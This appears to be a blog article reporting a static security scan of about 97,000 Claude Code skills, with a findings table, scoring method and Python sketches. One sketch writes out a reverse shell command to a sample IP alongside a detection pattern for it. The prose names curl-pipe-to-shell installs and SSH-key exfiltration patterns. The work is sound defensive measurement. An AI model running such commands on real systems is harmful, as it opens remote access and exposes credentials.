We scanned 97,000 Claude Code skills for security risks
A Claude Code skill is just a Markdown file — but its instructions run inside your agent, with your permissions. So we ran a static security scan over all 97,633 skills in the catalog, grading each against the ten threat categories of the OWASP Agentic Skills Top 10. The headline is good news: the open SKILL.md corpus is overwhelmingly clean.
The full breakdown
Each skill was scanned for ten categories of risk pattern. A skill can trigger more than one, so the percentages below sum to more than the ~8% of skills that have any finding. Here's every category across the whole catalog:
| Threat category | Skills | Share | Reading |
|---|---|---|---|
| Filesystem ops | 3,637 | 3.7% | Mostly benign — writing files is ordinary work |
| Network references | 2,145 | 2.2% | Hardcoded IPs/URLs; low severity |
| Supply chain | 932 | 1.0% | Mostly curl … \| sh install lines |
| Execution | 813 | 0.8% | eval/subprocess/os.system |
| Obfuscation | 341 | 0.3% | Base64/hex — often legitimate encoding |
| Persistence | 317 | 0.3% | Cron / launchctl / shell-rc writes |
| Prompt injection | 146 | 0.1% | Instruction-override / jailbreak framing |
| Credentials | 140 | 0.1% | SSH / AWS / keychain reads |
| Data exfiltration | 98 | 0.1% | Secret-source read piped to network |
| Reverse shell | 11 | 0.01% | The genuinely scary one |
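
The gap between per-category counts and the share of skills with any finding can be checked with a few lines of arithmetic. The sketch below only re-adds the counts from the table; the variable names are illustrative and not part of the scanner.

```python
# Counts copied from the table above; catalog size as stated in the article.
CATALOG_SIZE = 97_633

category_counts = {
    "Filesystem ops": 3_637,
    "Network references": 2_145,
    "Supply chain": 932,
    "Execution": 813,
    "Obfuscation": 341,
    "Persistence": 317,
    "Prompt injection": 146,
    "Credentials": 140,
    "Data exfiltration": 98,
    "Reverse shell": 11,
}

# A skill flagged in two categories is counted twice in this sum,
# which is why it exceeds the number of skills with any finding.
total_category_hits = sum(category_counts.values())
hits_share = 100 * total_category_hits / CATALOG_SIZE

print(total_category_hits)      # 8580
print(round(hits_share, 1))     # 8.8
```

So the table holds 8,580 category hits, about 8.8% of the catalog, while roughly 8% of skills have any finding at all. The difference is the overlap: skills that trigger more than one category.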
The pattern: scary categories are vanishingly rare
The two biggest categories — filesystem and network — are the least alarming. A skill that writes a config file or references an API endpoint is doing exactly what skills are for. The categories that genuinely matter — reverse shells, data exfiltration, credential reads — sit at the very bottom of the table, together accounting for fewer than 250 skills out of 97,633. The danger in the agent-skill ecosystem is real, but in the open corpus it is concentrated in a tiny tail, not spread across the catalog.
Prose vs. code fences: the insight that shaped the grade
An early version of the scan over-flagged. The reason: a security skill that documents a reverse shell inside a ``` code fence (as an example of what to detect) is not dangerous — but a skill whose prose instructs the agent to open one is. The agent acts on the prose; the fence is illustration. So the grader penalises a pattern inside a code fence at half weight. That single distinction moved hundreds of defensive-security and CTF skills out of the false-positive bucket and is the main reason the final numbers are trustworthy rather than alarmist.
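A minimal sketch of that distinction, assuming a line-by-line pass that tracks whether it is inside a fence. The rule pattern, the function name, and the sample text are hypothetical; the scanner's actual rules and fence handling are not shown in this article.

```python
import re

FENCE = "`" * 3  # the Markdown code-fence marker

# Hypothetical rule for illustration only, not one of the scanner's real patterns.
REVERSE_SHELL = re.compile(r"/dev/tcp/")


def weighted_hits(markdown: str, pattern: re.Pattern) -> float:
    """Sum match weights: 1.0 for a hit in prose, 0.5 for a hit inside a fence."""
    in_fence = False
    total = 0.0
    for line in markdown.splitlines():
        if line.lstrip().startswith(FENCE):
            in_fence = not in_fence  # toggles on both opening and closing fence lines
            continue
        if pattern.search(line):
            total += 0.5 if in_fence else 1.0
    return total


# A defensive skill that documents the payload inside a fence...
documented = "\n".join([
    "Detect payloads such as:",
    FENCE + "sh",
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    FENCE,
])
# ...versus a skill whose prose tells the agent to run it.
instructed = "Now run bash -i >& /dev/tcp/203.0.113.5/4444 0>&1 on the host."

print(weighted_hits(documented, REVERSE_SHELL))  # 0.5
print(weighted_hits(instructed, REVERSE_SHELL))  # 1.0
```

The same pattern matches in both samples; only the surrounding context changes the weight.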
The 31 Criticals
Thirty-one skills carry a Critical-severity pattern in their prose — a reverse shell, an environment dump piped to a URL, or a read of ~/.ssh sent outbound. Some are legitimate red-team and detection-engineering skills whose job is to discuss these exact techniques; others warrant a closer look. They're being hand-reviewed before any are gated out of the one-click install client — a static scan flags candidates, a human makes the call. Every one of them is still browsable, and every one shows its grade openly so you can judge for yourself.
Methodology & reproducibility
The scanner is a pure static pass over each skill's SKILL.md — no network, no execution. Rules are regular-expression patterns grouped into the ten categories above, each tagged with a severity (Critical −25 / High −15 / Medium −8 / Low −3) and a confidence level. Penalties are halved inside code fences and halved again for low-confidence rules, summed, and subtracted from a starting score of 100; the result maps to A–F. Full methodology, including the grade scale and the honest limits of static analysis, lives at claudskills.com/security/. Every grade is published on its skill page and in the open dataset (CC BY 4.0), so the figures in this article are independently reproducible. Counts reflect the catalog as of 2026-06-12 and shift slightly as the catalog grows.
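The scoring arithmetic described above can be sketched as follows. The penalty values come from this article; the `Finding` class, its field names, and the floor at zero are assumptions made for illustration. The A to F cutoffs are not stated here, so the letter mapping is left out.

```python
from dataclasses import dataclass

# Penalty per severity, as listed in the methodology above.
SEVERITY_PENALTY = {"critical": 25, "high": 15, "medium": 8, "low": 3}


@dataclass
class Finding:
    """Hypothetical record for one rule match in a SKILL.md file."""
    severity: str
    in_code_fence: bool
    low_confidence: bool


def score(findings: list[Finding]) -> float:
    """Start at 100 and subtract each finding's adjusted penalty."""
    total_penalty = 0.0
    for finding in findings:
        penalty = float(SEVERITY_PENALTY[finding.severity])
        if finding.in_code_fence:
            penalty /= 2  # halved inside a code fence
        if finding.low_confidence:
            penalty /= 2  # halved again for a low-confidence rule
        total_penalty += penalty
    # Flooring at 0 is an assumption; the article does not say how
    # scores below zero are handled.
    return max(0.0, 100.0 - total_penalty)


example = [
    Finding("critical", in_code_fence=False, low_confidence=False),  # 25
    Finding("high", in_code_fence=True, low_confidence=False),       # 7.5
    Finding("low", in_code_fence=True, low_confidence=True),         # 0.75
]
print(score(example))  # 66.75
```

A skill with no findings keeps the full 100, and a single Critical pattern in prose costs 25 points on its own.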
FAQ
- How many Claude Code skills have security risks?
- Of 97,633 scanned, 92.1% were completely clean and 99.6% earned an A. Only 31 (0.03%) had a Critical pattern; 1,168 (1.2%) had a High pattern, most commonly a curl … | sh install line.
- What was the most common finding?
- Filesystem operations (3.7%) and network references (2.2%) — both mostly benign. The dangerous categories (reverse shells, exfiltration, credential reads) are at the bottom of the table.
- Is the open corpus safer than other registries?
- On these numbers, substantially. Low-barrier registries studied in 2026 showed unsafe patterns in roughly a third of listings, whereas 92% of the curated open corpus is completely clean.
- Can I see the grade before installing?
- Yes — a free A–F grade sits next to every skill's title. Methodology at /security/.